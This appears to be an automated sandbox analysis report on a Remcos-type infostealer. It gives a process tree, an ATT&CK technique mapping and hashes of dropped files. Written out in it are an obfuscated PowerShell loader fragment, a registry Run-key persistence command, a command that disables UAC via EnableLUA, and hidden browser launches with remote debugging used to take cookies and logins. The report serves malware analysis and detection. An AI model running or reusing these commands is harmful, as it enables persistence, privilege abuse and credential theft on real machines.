Pot $S udAu,ben pa,AT reLOpskyT rbSUtaleR mmMSemiOIn edIndfeOverL');Svmmeprvens (Sastrugi 'Tilb$ Lnug Bygl ,vaost.ib ,asaBonzlNond:.eloK AncaIdellParnk AteuK,rdnnerdlScruaHyp aH rrr lsf Eng=Unfa Bom,[OrgaSKompy Pols Prot KoreRolemBall.hydrC A hoLacqnUnr,vDataeMailrVe etAnke] Das:Ka.t: CesFHeltr Ostosn gmChamBIslaaPaafs .iseKaka6 Dek4PoliSUnuntEdderOveri Ov n klugPhi (Fo s$BaasU DjvdBerel ,adbAbsos untAngeiKarldArunsS inpKlenu Catn CytkGenotB oweSk ut Hel)');Svmmeprvens (Sastrugi 'M lt$Fri.gUds lLeptoGalmB nodAOverlKame:SlagS BurTTrosASk naIndottrekR eulOImmul HakD halEBurgNKanusIn e ,lg=Livr Komm[TomnsBa.tyWreas UnpT OveEBemamUd n. PsaTVerde ernX conTKopo.VoldEHyp,NNonicstnnomar.dSpk,IFotonB.atGKigg]Spoo: Pan:ChorAwomesBillCCirciUndii hai.An.igIs rEScarTNyopSAlfrtInadrGashIK mmNnic g r.g( Mar$DeraKEarmAAposl RevKOb tUFl,bnTe elKonsa .mka VesRGraf)');Svmmeprvens (Sastrugi ' Skr$VictgIndll Ci.O aksB teoa CorlLi e:GufscKnska SpuVM,ntaSluklBypa= Cha$ Ep,SGranT TacA.isaAKlasTAa,eROnomOadvaL rieDReine.eriNstn,sen a. ImpsaandUT,lebP,rnsSport SlarUndeIStraN GengSecc(Skal$Und.rKny.EP lhGBindiUnexocof.NS avAIwbelUndiPPhilr oldoRoitgSkovRHotnaBee mAestMSyr ESmugRPrecnVkkeE Fr nBlacd eouS PenmPavoUGagcg upilValgIBre NNondg CapeSt,eRHur,n,ilbETrip,out,$ Ve dCom iMonoS PosjBet U EgoNSma cSammTDissO ProR tr )');Svmmeprvens $Caval;"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2128
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1304
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Aidless125% -windowstyle 1 $Grangiveligt=(gp -Path 'HKCU:\Software\Produktionsdatabaser11\').Monociliated;%Aidless125% ($Grangiveligt)"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2700
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Aidless125% -windowstyle 1 $Grangiveligt=(gp -Path 'HKCU:\Software\Produktionsdatabaser11\').Monociliated;%Aidless125% ($Grangiveligt)"
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:2308
- - C:\Windows\SysWOW64\cmd.exe
    /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1448
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:3548
- - C:\Program Files\Google\Chrome\Application\Chrome.exe
    --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:936
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff979c5cc40,0x7ff979c5cc4c,0x7ff979c5cc58
      4⤵
      PID:900
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1900,i,15977516921087630068,2430459181341379394,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1896 /prefetch:2
      4⤵
      PID:3028
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1976,i,15977516921087630068,2430459181341379394,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2440 /prefetch:3
      4⤵
      PID:4232
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1992,i,15977516921087630068,2430459181341379394,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2564 /prefetch:8
      4⤵
      PID:2108
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3176,i,15977516921087630068,2430459181341379394,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3184 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:4792
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3188,i,15977516921087630068,2430459181341379394,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3252 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:2052
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4668,i,15977516921087630068,2430459181341379394,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4612 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:1716
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\xpkswwkgokqwnbglnvxrcprencdvxybjva"
    3⤵
    PID:3932
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\xpkswwkgokqwnbglnvxrcprencdvxybjva"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:952
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\ijxlwpv"
    3⤵
    - Accesses Microsoft Outlook accounts
    - System Location Discovery: System Language Discovery
    PID:1972
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\slddphgbqa"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4452
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    - Enumerates system info in registry
    - Modifies registry class
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    PID:4240
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff979b146f8,0x7ff979b14708,0x7ff979b14718
      4⤵
      PID:3100
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1916,13466572126126775085,13281753135146296624,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2240 /prefetch:2
      4⤵
      PID:3956
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1916,13466572126126775085,13281753135146296624,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 /prefetch:3
      4⤵
      PID:4504
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1916,13466572126126775085,13281753135146296624,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2804 /prefetch:8
      4⤵
      PID:1284
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=1916,13466572126126775085,13281753135146296624,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:2456
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=1916,13466572126126775085,13281753135146296624,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:1968
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=1916,13466572126126775085,13281753135146296624,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3924 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:3328
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=1916,13466572126126775085,13281753135146296624,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5368 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:1436

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:1784

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:968

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4288

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Modify Authentication Process

T1556

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Authentication Process

T1556

Modify Registry

T1112

Credential Access

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
858c18ff79e9a8fb29b7fc84c6431489

SHA1
ee4c338f50c00dd9b036dc14f101ef79103c90af

SHA256
040ea403980b315d41ee1a90b6847c6f819472325b9cc7950e4ee7e120e2c43f

SHA512
76cbda2306e223a9279cea65134b95bbe8d91fb883878772320071deeb2916276d567d05082a11132553154832ee5df4ac62d0871c12deb93008842db4d64a47

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d4ff23c124ae23955d34ae2a7306099a

SHA1
b814e3331a09a27acfcd114d0c8fcb07957940a3

SHA256
1de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87

SHA512
f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

Filesize
40B

MD5
88c491f3a464c01c7a889d513bea4175

SHA1
b739a51dd9dfdced7d6ae754f9b7a56a0098afa7

SHA256
c812fd38f4c900863690cd10d6e7abcc9e21c57ca06ff1afa872dd93d8d7ab46

SHA512
74c7a979a1340387d90de1ae555cdf0c00800a8d4154858a0c6638b1409193d6f1cf6b93359011a4f0d4ce0085a607e113aac0db5baf41053f475f66c9a0b599

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

Filesize
152B

MD5
3f7774c08f2c9895d16a230d9b6ea6b8

SHA1
818b6e57b6f257e2737d78f1b16d7aff0a3ddc6b

SHA256
c864f54ead739c824703caccf900065dc3e375a471f698ad83026f1bfdb38dac

SHA512
3af8803413954e8079a3b0162cf43684463feb87c32157d10cb1470d439bc6471ff376c86ba58ac80465f426cf0965123fe4bccb52f193c93b701eb7580e16bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

Filesize
152B

MD5
8b894511428cacb69e61bc2c005ae284

SHA1
d4d8b5123edb675c25193f632a3ad51dce0059de

SHA256
837af34e8dc3b65bee87e3ff04026b3ba1420f5b5af4ff85d2775b176e058bb6

SHA512
3b741cb75055ceda7e7e5df947a8ffba236d10d5b1fe43839649d34ce4d57718e55eface7f4447ba09bd3765821312e27f713a106c9e112f6aff144d5a850335

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

Filesize
152B

MD5
3eaf89eb3e4f23173b9951a52cc32c07

SHA1
a4adb964ccf3aea0787e9ef88a75dd8ff882005e

SHA256
4cb6702c8b00a7984757b76fbbe816912954bdacce6d142a8185c6754179a8d3

SHA512
47199fb56306694f210646dca320a09ba0fa6fdbb7e2b9679cb3935f8cbf768e040d4c153e64a5932fe768301f53412083b4a5ea6b771fdbb1fe060b15e5cefb

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\throttle_store.dat

Filesize
20B

MD5
9e4e94633b73f4a7680240a0ffd6cd2c

SHA1
e68e02453ce22736169a56fdb59043d33668368f

SHA256
41c91a9c93d76295746a149dce7ebb3b9ee2cb551d84365fff108e59a61cc304

SHA512
193011a756b2368956c71a9a3ae8bc9537d99f52218f124b2e64545eeb5227861d372639052b74d0dd956cb33ca72a9107e069f1ef332b9645044849d14af337

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\js\index-dir\the-real-index

Filesize
48B

MD5
b659d4840c279af8627daf72f6e34507

SHA1
204ecba22ee05537a48f5467c45318d3a017255c

SHA256
2507c431a24fdd7dc900bc517bb65e4e5704bf66379c450ace375ee9453a3b69

SHA512
95db54e928c8a5980d8448b637fd62da2e5a5431c13ff16c56fdbfaecaf4d924450dcf20ebfabf1665e05b5db0a2c2a22e7bc82f5a9f6fd8c13dd044cf012dad

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\wasm\index

Filesize
24B

MD5
54cb446f628b2ea4a5bce5769910512e

SHA1
c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

SHA256
fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

SHA512
8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\wasm\index-dir\the-real-index

Filesize
48B

MD5
908b0b089319804b6fd559f013246a03

SHA1
92897b0174f1dadbc74042778a5a74d7d06151c7

SHA256
0c499082779f8e25b9d0e7cf4f3f4a1f41452a391c0535b0942417096dc413a3

SHA512
249c6b64f1f0ba4b35b332fa78c906fd3a9de8838511da5a7e73201718919760f29fcb6836befc28b5134476cf028a2ba23edced86dbdb8adaf1cabd21d236c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Extension State\LOG

Filesize
263B

MD5
b1a8acc9298239284733b4b52f7b2a2b

SHA1
c8d02d9e18993a765b55ff2aec5afe34cfbd2405

SHA256
562b8db1f6f511b4f434ff9dcdc7803c12d706013b89d1f5156c3e085cd9eb9b

SHA512
4997438f7d6ec82d72af7a74ba92a3ac37d8fd494ee0fad37223a59d15e4240af0c698cdd4eb2d6e669867242cb7097a56a3b25d7f2dd65ff5ba9d657c30abda

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Favicons

Filesize
20KB

MD5
b40e1be3d7543b6678720c3aeaf3dec3

SHA1
7758593d371b07423ba7cb84f99ebe3416624f56

SHA256
2db221a44885c046a4b116717721b688f9a026c4cae3a17cf61ba9bef3ad97f4

SHA512
fb0664c1c83043f7c41fd0f1cc0714d81ecd71a07041233fb16fefeb25a3e182a77ac8af9910eff81716b1cceee8a7ee84158a564143b0e0d99e00923106cc16

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\GPUCache\index

Filesize
256KB

MD5
ab62ac0c4ca8ebbcb0bfea84756f66a3

SHA1
3cf188d4a35850127ed7f0aa4ebe53960a49f805

SHA256
31e009fe7f7e02c84b28079c61ecb95d27cdd6eb2b25c0c9450305c7fdbe404f

SHA512
7ff731c02dad767455bfb138147950b305ac8c7bf5945835d15ce2bec5b0c9200d4cf5969e178fcf0bd98d15588c2eb5795ed57622e5971bf18620c5f45befb8

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\History

Filesize
192KB

MD5
d30bfa66491904286f1907f46212dd72

SHA1
9f56e96a6da2294512897ea2ea76953a70012564

SHA256
25bee9c6613b6a2190272775a33471a3280bd9246c386b72d872dc6d6dd90907

SHA512
44115f5aaf16bd3c8767bfb5610eba1986369f2e91d887d20a9631807c58843434519a12c9fd23af38c6adfed4dbf8122258279109968b37174a001320839237

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\LOG

Filesize
275B

MD5
dcc2663d913970ca79deb9ff025456bd

SHA1
d02460c79e5a817eefd27e8c78c88019f53af4a4

SHA256
b2048d2e695acc9dcd63b6bdd22e5432de08251e25eecede7ba4cf52d0d476cb

SHA512
73273970a769be1055b9eb983086a17b5f790399e7911c7b66296e987f132929a3556f580cb09cc30df2f242e429db6cb6810e1811bff850485539ba6765117a

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Login Data

Filesize
40KB

MD5
a182561a527f929489bf4b8f74f65cd7

SHA1
8cd6866594759711ea1836e86a5b7ca64ee8911f

SHA256
42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

SHA512
9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Microsoft Edge.lnk

Filesize
1KB

MD5
a1cf0682c438fb350a2569f82f757e03

SHA1
863d973d3d16187fe8f960b29fbf10e83cdf1a4e

SHA256
0957395a207bbd6d5093102f089336c2a338c9899c146a55ea41d9781277e9cf

SHA512
0383ab7bdade354779c1c073453cf5f74cf7a6e489e9767b18911b1bac53a3d3bff9654f36acfc1f647e72d4e1050362dfdf7c45a05795c9348b76da34f5997e

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\Cookies

Filesize
20KB

MD5
616655bc7fa9ba0a1a6cd14cf4e582a7

SHA1
90a86c6ba760ec3271906740359ac1b5f12b8063

SHA256
d18c651e7b7717df0a44790dcd7df1d0a28c75f95412d163fce13ceda06a4c2d

SHA512
641b14a377f89b87ae3cf45a26de7150472fabdec2f62e0d969c0129684149092ff74214a2c620068e20ba49bb1eefe4b6b3c18802b8c6149a60588a21095eed

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences

Filesize
5KB

MD5
76fa0e55c1ffdfc1c357751c88d7ecf3

SHA1
ebedcb05c80fe9d29e5c006c4e322fd083577d33

SHA256
47901cf5c822a4707d3f6b00879821f14372d06cda42dc8d04c4ef12fe892f70

SHA512
be46a8bcbd242ecc36b0eaad7d41071bdd52673f56b484738e69bb9faab7f05848d75f823a1d1678541cf6613d2fa002ad31be2f70898ee47283bc5aafbcdfff

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences

Filesize
1KB

MD5
1579d58a26f27dfaa977b3b2089ae52a

SHA1
a7142ff0359c843283460a587e54b84145e65aeb

SHA256
36518a18ce1fafc2e67795dd8a4abe1b8a19d6f2af5ad001b91fa450fc66871c

SHA512
7887a1d765253168334f98b227869adf2bce24f594008b0c2ba0fb8bf08655a91db723e5d4b5e7dd584a0054a8f96ef91ae9e1a9fcef901c37865d7586da8631

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

Filesize
24KB

MD5
62fa438b48fdfb61c360e6d4fd356110

SHA1
6e54e946a5211afa1459715b9f37a18ea92cdd57

SHA256
fe3d2e83848ede65097467a54ea813ed25a51119e87121089b3cfc531ebe5798

SHA512
01ada296a3fefe713f53d80d2c95b6e41231012d0998077b7948a68d961b61292d1e3b1b3457488eaa739fc4ff0974672ee448d29d2fcce2c1bebab49da96624

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

Filesize
15KB

MD5
c6c59a39ea2a8bd650f111ad9bffbb18

SHA1
dab48c89ed54dad31f37d13fc5768285afeb370b

SHA256
bb0c7af9010736950f57d7e37f32bbae1349323ae4399bdc0261774cdf63ea72

SHA512
ef16ca2301cd2b0410b7f16dcbd74a242060397a68187e5140ac02b6535241724bac574124dc20c78952ba1d678e02c887ccb61e5d9f527c0ebca8915a2c8c18

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\000003.log

Filesize
241B

MD5
9082ba76dad3cf4f527b8bb631ef4bb2

SHA1
4ab9c4a48c186b029d5f8ad4c3f53985499c21b0

SHA256
bff851dedf8fc3ce1f59e7bcd3a39f9e23944bc7e85592a94131e20fd9902ddd

SHA512
621e39d497dece3f3ddf280e23d4d42e4be8518e723ecb82b48f8d315fc8a0b780abe6c7051c512d7959a1f1def3b10b5ed229d1a296443a584de6329275eb40

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\LOG

Filesize
281B

MD5
25f6e174b0ec89dda4e707c141aba436

SHA1
1e006638b64d8ef9dcbe515327b4b6a49d602f39

SHA256
31269d5ee4421287a1e32a13c3b559ed0c5dba2bafe733a628c411bbb58989ff

SHA512
b3a881dc217b926ceaf20e4dff695bc5f78f1974753b9e09ae2bb80d094733cde4306d271b165b60b2c2c7a423a6e40fa7c39f467d93347aee13d8e35622cfe5

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\000003.log

Filesize
80B

MD5
69449520fd9c139c534e2970342c6bd8

SHA1
230fe369a09def748f8cc23ad70fd19ed8d1b885

SHA256
3f2e9648dfdb2ddb8e9d607e8802fef05afa447e17733dd3fd6d933e7ca49277

SHA512
ea34c39aea13b281a6067de20ad0cda84135e70c97db3cdd59e25e6536b19f7781e5fc0ca4a11c3618d43fc3bd3fbc120dd5c1c47821a248b8ad351f9f4e6367

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\LOG

Filesize
263B

MD5
8d27d7af1654efed1397656b0dc0c854

SHA1
bc2fb8871e4d48009c0bdc7315d5bb21ec8378ac

SHA256
99ce3739d27eabe593ba38116820765cccd405e4ef00e0546b239719e111c20f

SHA512
04e39922b3d9447c67e1677ba00d248227cd1b28bf0281f17420210a69c2de84f2310cb6f4dd24de4a82c48ec8a4b27c31ae19f214dc7f48ff9c313f40e94188

Download Submit
